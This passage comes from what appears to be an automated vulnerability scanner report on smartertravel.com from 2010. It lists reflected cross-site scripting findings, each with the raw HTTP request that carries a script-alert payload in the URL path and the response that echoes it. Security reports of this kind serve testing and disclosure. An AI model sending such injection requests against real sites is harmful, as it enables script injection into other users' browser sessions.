Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 01:42:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 01:42:13 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 01:42:13 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 01:42:13 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/blogs2102f<script>alert(1)</script>fcec8a82390/</p>
...[SNIP]...

2.13. http://www.smartertravel.com/car-rental/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /car-rental/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b443b<script>alert(1)</script>9ae59a7f381 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /car-rentalb443b<script>alert(1)</script>9ae59a7f381/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 00:29:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:30:05 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:30:05 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 00:30:05 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/car-rentalb443b<script>alert(1)</script>9ae59a7f381/</p>
...[SNIP]...

2.14. http://www.smartertravel.com/columns/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /columns/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b2fa9<script>alert(1)</script>fed837284a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /columnsb2fa9<script>alert(1)</script>fed837284a3/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:01:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:02:08 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:02:08 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:02:08 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/columnsb2fa9<script>alert(1)</script>fed837284a3/</p>
...[SNIP]...

2.15. http://www.smartertravel.com/community/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /community/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload edeee<script>alert(1)</script>99c0f76b944 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communityedeee<script>alert(1)</script>99c0f76b944/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 00:29:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:29:41 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:29:41 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 00:29:41 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/communityedeee<script>alert(1)</script>99c0f76b944/</p>
...[SNIP]...

2.16. http://www.smartertravel.com/community/login.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /community/login.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 13c68<script>alert(1)</script>2a6e809d94a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community13c68<script>alert(1)</script>2a6e809d94a/login.php HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 23:51:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:51:23 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:51:23 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:51:23 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/community13c68<script>alert(1)</script>2a6e809d94a/login.php</p>
...[SNIP]...

2.17. http://www.smartertravel.com/community/login.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /community/login.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ac392<script>alert(1)</script>991e5996a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community/login.phpac392<script>alert(1)</script>991e5996a HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 23:51:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:51:47 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:51:47 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:51:47 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/community/login.phpac392<script>alert(1)</script>991e5996a</p>
...[SNIP]...

2.18. http://www.smartertravel.com/community/register.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /community/register.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 64c55<script>alert(1)</script>de27ede1522 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community64c55<script>alert(1)</script>de27ede1522/register.php HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 23:49:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:50:22 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:50:22 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:50:22 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/community64c55<script>alert(1)</script>de27ede1522/register.php</p>
...[SNIP]...

2.19. http://www.smartertravel.com/community/register.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /community/register.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 42472<script>alert(1)</script>5434f6837df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community/register.php42472<script>alert(1)</script>5434f6837df HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 23:50:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:50:28 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:50:28 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:50:28 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/community/register.php42472<script>alert(1)</script>5434f6837df</p>
...[SNIP]...

2.20. http://www.smartertravel.com/compare-prices/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c8308<script>alert(1)</script>693a0f0e927 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /compare-pricesc8308<script>alert(1)</script>693a0f0e927/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 23:48:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:49:16 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:49:16 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:49:16 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/compare-pricesc8308<script>alert(1)</script>693a0f0e927/</p>
...[SNIP]...

2.21. http://www.smartertravel.com/compare-prices/car-rental/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/car-rental/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ce18<script>alert(1)</script>4b77517ffa3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /compare-prices2ce18<script>alert(1)</script>4b77517ffa3/car-rental/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

